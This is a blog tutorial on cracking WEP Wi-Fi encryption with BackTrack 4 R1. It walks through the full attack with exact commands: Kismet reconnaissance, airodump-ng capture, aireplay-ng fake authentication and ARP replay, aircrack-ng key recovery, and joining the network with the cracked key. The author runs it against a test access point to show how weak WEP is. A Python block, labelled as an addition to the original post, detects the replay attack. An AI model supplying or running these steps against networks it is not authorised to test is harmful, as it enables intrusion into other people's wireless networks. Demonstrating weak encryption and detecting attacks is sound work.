WEP cracking with BackTrack 4 R1
Nov.03, 2010, under Networks, Security
It's a well-known fact that WEP is fundamentally broken, and it's also a well-known fact that it can be cracked very easily. Unfortunately it doesn't seem to be well known enough, as I frequently come across friends who only use WEP encryption on their wireless. The best way to convince them to change it is to demonstrate how easy it is to break, which is what this post is about. This post is for my benefit as much as anyone else's. I realise it's been done to death and there are hundreds of tutorials already out there, but whenever I need to do this I can never remember the commands, and the stuff online never seems to be quite correct or is slightly out of date regarding command switches etc.
I’ll be using a standard laptop running BackTrack 4 R1, with an Alfa USB wireless adaptor (AWUS036H). Using a well-tested adaptor such as this will solve a lot of headaches as it is literally plug and play.
I'll split this into four steps: finding the target; performing the attack; cracking the key; and connecting to the network. For the purposes of this I've set up an access point running 64-bit WEP so the capturing goes a little faster. I'm going to skim over a lot of the theory since it is available elsewhere in much better detail than I'll be able to go into.
Finding a target
This bit is pretty easy. Boot your BackTrack live CD, type 'startx' to get into the GUI and then open a shell window. The tool we'll use to scope out available APs is called Kismet. Before we run this we need to identify our wireless interface by running iwconfig. In my case the interface is called 'wlan0'.
Then we start Kismet. It has a server and client component, which you can run separately. If you run just the client and the server isn’t running, it will prompt you to start it anyway. I’ll use the option of running the server separately:
kismet_server
Then in a new shell run the client:
kismet
The client will warn you that you are running as root, and then ask you to choose a capture interface since none is defined. This is the interface you found from iwconfig; type in its name exactly as it was written. If you get an error you might be using the wrong interface, so keep trying wireless adaptors until you find the one that works. Once Kismet is running we can see a list of the available wireless networks plus a ton of information. There is a lot of stuff to explore, but the info we are concerned with is the bssid, the essid and the channel it is on. Below we can see my test network as seen by Kismet. Feel free to try the other menus and options to get a handle on the tool.
From this then we can see the info we need to make a note of:
- essid: test
- bssid: 00:14:6C:6E:B4:7C
- channel: 11
Performing the attack
To crack WEP we need to capture packets carrying Initialisation Vectors (IVs). Once we have enough of these we can attempt to crack the key. If you just set something off to monitor you'll find that these occur naturally, but to get the amount required for cracking we can do a few tricks to speed up the process. We are going to send packets to the AP which will cause it to send out IVs at a much faster rate than normal. I'll also show you how to fake an association with the AP from the laptop; usually you can use already connected clients to perform the attack, but if there aren't any this is a handy trick.
If at any point during this part things don't work or you get errors, I've found the best fix is simply to reset the wireless adapter by disconnecting and reconnecting it.
First close Kismet so it doesn’t interfere, and run the following command in a shell window to start the IV capture:
airodump-ng --channel 11 --bssid 00:14:6C:6E:B4:7C --write /testcap --ivs wlan0
--channel 11 means capture on channel 11
--bssid 00:14:6C:6E:B4:7C means capture only traffic for the given bssid
--write /testcap is where we want the output saving
--ivs means only capture packets containing IVs
wlan0 is the interface to capture on
You'll get a screen with some stats, but assuming there are no clients connected it won't show much traffic yet. Now we are going to set off a fake authentication against the AP in another shell window. This will cause our laptop to associate with the AP so we can use it to generate IVs:
aireplay-ng -1 0 -e test -a 00:14:6C:6E:B4:7C -h 00:C0:CA:11:22:33 wlan0
-1 0 use attack 1 (fake authentication); the 0 is the re-association delay, so it authenticates only once
-e test is the target essid of the fake auth
-a 00:14:6C:6E:B4:7C is the target bssid
-h 00:C0:CA:11:22:33 is the MAC address of the wireless card (got via ifconfig; you may need to run ifup wlan0 if it doesn't show up)
wlan0 is once again the source interface
So now we are capturing traffic and have a client to use for the attack. The next command is:
aireplay-ng -3 -b 00:14:6C:6E:B4:7C -h 00:C0:CA:11:22:33 wlan0
-3 use attack 3 (ARP request replay)
-b 00:14:6C:6E:B4:7C is the target bssid
-h 00:C0:CA:11:22:33 is the MAC address of the wireless card
wlan0 is once again the source interface
Eventually you should see some ARP replies (it may take a while to start). Now look in the airodump window at the column labelled #Data. This is the number of packets we've captured, which are all IVs thanks to our airodump filters. The number you need to perform a crack may vary. I find the best approach is to try a crack every 50,000, which leads us on to the next part.
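For the defender's side of the replay step above, here is an added example (my own illustration, not code from the original post) of the kind of check a wireless IDS runs over a monitor-mode capture. The injecting station resends one captured encrypted ARP request verbatim, so the same WEP IV shows up from the same source MAC hundreds of times per second, whereas a legitimate client draws a fresh 24-bit IV for each frame. The AP bssid and the injecting card's MAC are the ones used in the post's commands; the frame records and the legitimate client's MAC are constructed for the demo.

```python
# Added example, not from the original post: flag the WEP replay-injection
# pattern (same IV from one source at a high rate) in a capture summary.
from collections import defaultdict

# Frame record: (timestamp_s, src_mac, dst_mac, bssid, frame_len, iv_hex)
AP = "00:14:6C:6E:B4:7C"          # bssid from the post
INJECTOR = "00:C0:CA:11:22:33"    # card MAC used in the post's aireplay-ng commands
NORMAL = "00:1B:77:AA:BB:CC"      # constructed legitimate client


def build_sample_capture():
    """Constructed capture: 40 normal exchanges, then 400 replayed ARP requests."""
    frames = []
    t = 0.0
    for i in range(40):
        size = 120 + (i % 7) * 30
        # legitimate client and AP each use a fresh IV on every frame
        frames.append((t, NORMAL, AP, AP, size, f"{0x1A2B00 + i:06x}"))
        frames.append((t + 0.005, AP, NORMAL, AP, size, f"{0x7C0000 + i:06x}"))
        t += 0.25
    for i in range(400):
        # replay: identical 68-byte frame with the same IV, ~500 frames/second
        frames.append((t, INJECTOR, AP, AP, 68, "5f3e2d"))
        # the AP answers each replay with a new IV (this is what fills #Data)
        frames.append((t + 0.001, AP, INJECTOR, AP, 68, f"{0x9A0000 + i:06x}"))
        t += 0.002
    return frames


def detect_wep_replay(frames, window_s=1.0, repeat_threshold=50):
    """Return one alert per (source, IV) pair seen >= repeat_threshold times in any window_s.

    Sliding-window count per (src, iv); a real station repeats an IV only by
    accident and never in a burst, so a dense burst of one IV is injection.
    """
    seen = defaultdict(list)
    for ts, src, _dst, _bssid, _length, iv in frames:
        seen[(src, iv)].append(ts)
    alerts = []
    for (src, iv), times in seen.items():
        times.sort()
        lo, best = 0, 0
        for hi in range(len(times)):
            while times[hi] - times[lo] > window_s:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= repeat_threshold:
            alerts.append({"src": src, "iv": iv, "max_per_window": best})
    return alerts


def iv_uniqueness_ratio(frames):
    """Per source MAC: unique IVs / frames sent. Near 1.0 is normal; near 0 is replay."""
    ivs, counts = defaultdict(set), defaultdict(int)
    for _ts, src, _dst, _bssid, _length, iv in frames:
        ivs[src].add(iv)
        counts[src] += 1
    return {src: len(ivs[src]) / counts[src] for src in counts}


if __name__ == "__main__":
    capture = build_sample_capture()
    for alert in detect_wep_replay(capture):
        print("WEP replay suspected:", alert)
    for src, ratio in iv_uniqueness_ratio(capture).items():
        print(f"{src}: unique-IV ratio {ratio:.4f}")
```

The uniqueness ratio is the cheaper signal to keep as a per-client metric, while the windowed IV-repeat count is what you would raise an alert on; both are zero-cost to compute from the header fields airodump-style tools already expose, since the IV sits unencrypted in the WEP frame.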
Cracking the key
This bit is really easy; just run the following command:
aircrack-ng -s /testcap-01.ivs
If it takes more than a couple of seconds, wait until you have more IVs. Now we have all the info we need to connect to the network.
Connecting to the network
Nothing surprising here, just using the info we already have to get on the network.
ifdown wlan0
iwconfig wlan0 mode managed
iwconfig wlan0 channel 11
iwconfig wlan0 essid test
iwconfig wlan0 key 1b9dda483d
ifup wlan0
At this point you should get an IP via DHCP; if not, try running "dhcpd wlan0". If you do this a few times you can get pretty fast at it, and 5-10 minutes will be all you'll need to perform the full attack.